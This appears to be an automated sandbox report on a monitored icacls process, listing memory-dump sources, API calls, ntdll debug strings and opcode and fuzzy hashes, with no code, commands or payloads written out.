                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 030D708A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,030D0CE0,030E6087,030E3967,?), ref: 030D6EA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                                                                                        • Instruction ID: 9aa265a707194c17db976279ef81c682fabbe7cf3295cd78f5aa45c5892c51dc
                                                                                                        • Opcode Fuzzy Hash: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                                                                                        • Instruction Fuzzy Hash: 94B02B718019C4C5EA00E320060C7073D0867C0300F19C0A1E2034241E0738C0C0F171
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 791b99a98350a28eed60e538bb5d7ac089ecdaba5da6bb7fa7f20682b869381a
                                                                                                        • Instruction ID: 86489dd3fda15843e55816c3eae5a9f9adb21c33f374dbe3f13bf9c2935b15aa
                                                                                                        • Opcode Fuzzy Hash: 791b99a98350a28eed60e538bb5d7ac089ecdaba5da6bb7fa7f20682b869381a
                                                                                                        • Instruction Fuzzy Hash: E5C09B17B454C40881161D9634510F5FB30C447065F6572E7D9D8B3705D40291365BB9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3fc0247848edc14c750ad2a149602311e7b42599c50acc8e2c70f76b6f9f7c62
                                                                                                        • Instruction ID: 38ffa558349cb6dff58545071ac91199007e8df92d9019eeb461c19f5fb629ca
                                                                                                        • Opcode Fuzzy Hash: 3fc0247848edc14c750ad2a149602311e7b42599c50acc8e2c70f76b6f9f7c62
                                                                                                        • Instruction Fuzzy Hash: AFB01227F5100401C4200C0DB4402F0E364C387131D4032A3EC0CF35000047C49600DD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                                                                                        • Instruction ID: 7f97f70fb92c0a32006e529ccf17c6c1982fa7c3d877b4351af333e02a760a32
                                                                                                        • Opcode Fuzzy Hash: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                                                                                        • Instruction Fuzzy Hash: B8513BB5A005267FCB61DF98898097EFBBCBB492407148669E8A5D7745D334DE40C7E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 0f7b741115844bc54b61297d0f3743549a47add322377741c8d1fdf653fc62b9
                                                                                                        • Instruction ID: ec13b1fec60b98ee22f8c90ffa31436933d7d1b78b23344a4af37dcba1995b3a
                                                                                                        • Opcode Fuzzy Hash: 0f7b741115844bc54b61297d0f3743549a47add322377741c8d1fdf653fc62b9
                                                                                                        • Instruction Fuzzy Hash: 6051F5B5A00649BEEF20DF9DC89097EB7FDAF48240B048CAAE4D6D7641D7B4DA408761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 03954713
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03954742
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039546FC
                                                                                                        • ExecuteOptions, xrefs: 039546A0
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03954787
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03954725
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03954655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                                                                                        • Instruction ID: 842eb26770229b8b79f7890791acea7b4cb96ff26e1b77017a43bf2cce4fc59d
                                                                                                        • Opcode Fuzzy Hash: d63545e97866eacdf66b0aa2c0da26ffb6c75e9666f809e822782c777a40f7e5
                                                                                                        • Instruction Fuzzy Hash: 2D511735A0131E6ADF10EAE9EC99FAD77ACAF44340F0404D9E505BB181EB719AA1CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction ID: 65b33bf1d950a90f60b5b52f35a2d530ee38d15a89590fad797702fefb8a3bad
                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction Fuzzy Hash: 59021475508341AFD704CF58CA90AAFBBF9EFC8740F048A2DB9894B264DB71E905CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 78d449958af5a14375954723905aa2b95dabb720f214b88744bb622d88097eaf
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 4A81E030E01A699EDF24DE68C8907FEBFFAAF443A0F1C4559D861A7799C7348840CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 374a10640a01d73238cda2b8608e9df0dafce0c98b2f224af423161ee8e3ddf6
                                                                                                        • Instruction ID: 73303982f8faaf21526f8c6987bc36b335b98188468d58a191a5876f57968561
                                                                                                        • Opcode Fuzzy Hash: 374a10640a01d73238cda2b8608e9df0dafce0c98b2f224af423161ee8e3ddf6
                                                                                                        • Instruction Fuzzy Hash: 5621517AE0021DABDB20DF69D840AEFBBECAF44694F180526E945E7200E730D9118BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039502BD
                                                                                                        • RTL: Re-Waiting, xrefs: 0395031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039502E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                                                                                        • Instruction ID: 5dc7a7bd05cd646518945763c696c64da0a6019218730ee651b04f2f2bf0f5d1
                                                                                                        • Opcode Fuzzy Hash: ff9e061911001b03da3dad1188d39b148de3ecc017cefe6e0c9ed39f76eb75f6
                                                                                                        • Instruction Fuzzy Hash: 11E1BE316087419FD724CF28C884B2AB7E8BF84754F180A5DF8A68B3E1D774DA85CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 03957B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03957B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 03957BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                                                                                        • Instruction ID: d5324b1e4324debcc84d216ec792a0af2c773969215745e9e63ea47fa02e3e31
                                                                                                        • Opcode Fuzzy Hash: 2a93d514a25112f4f7181eb083ea15ed376087c2497a1a8993f99d89e624ffd5
                                                                                                        • Instruction Fuzzy Hash: 0E4111353017069FD720DE69C840B6AB7EAEF88720F040A1DF85AEB780DB30E955CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0395728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03957294
                                                                                                        • RTL: Resource at %p, xrefs: 039572A3
                                                                                                        • RTL: Re-Waiting, xrefs: 039572C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                                                                                        • Instruction ID: 0efc26e136458058a2496efd6bf1fbd7ec908724779c011ef845aa7855f383af
                                                                                                        • Opcode Fuzzy Hash: a2197ae521624c85731c9e8e3309763c79d91ad66f01636f5c41138698c6bb14
                                                                                                        • Instruction Fuzzy Hash: E541FF3570030AABD720CE65CC41B6AB7AAFF84750F144A19FC56EB280DB31E992CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 4ee65347b3c089f4f5d5a4443134f5a00056aa4ecb80e87f2cd093821fd87441
                                                                                                        • Instruction ID: 9ed2cb0a562be5e233072558584012892df53c59ccb536f111622a1089157173
                                                                                                        • Opcode Fuzzy Hash: 4ee65347b3c089f4f5d5a4443134f5a00056aa4ecb80e87f2cd093821fd87441
                                                                                                        • Instruction Fuzzy Hash: 75315776A0061DAFDF20DF2DDC41BEEB7BCEF54650F444556E889D7240EB309A448BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 985f398a928344f602fee8f338ce639c6e69c46f255d1b48532fe9f7018ae475
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: A291E470E04A369BDF24DEA9C8816FEBFA9FF44360F18451AE865F72D9D73089408760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                                                                                        • Instruction ID: ae28a33430ee5d3f9a6364e16834cf1b458f9baabb068ca697314bedc7cc78bd
                                                                                                        • Opcode Fuzzy Hash: b2247c6ca4f943f431fc3f4ca6fe725840a3a414225a08597ab981ce9e537dd5
                                                                                                        • Instruction Fuzzy Hash: C3813975D002699BDB31DB94CC44BEEB7B8AB49750F0445EAEA19F7280D7749E80CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%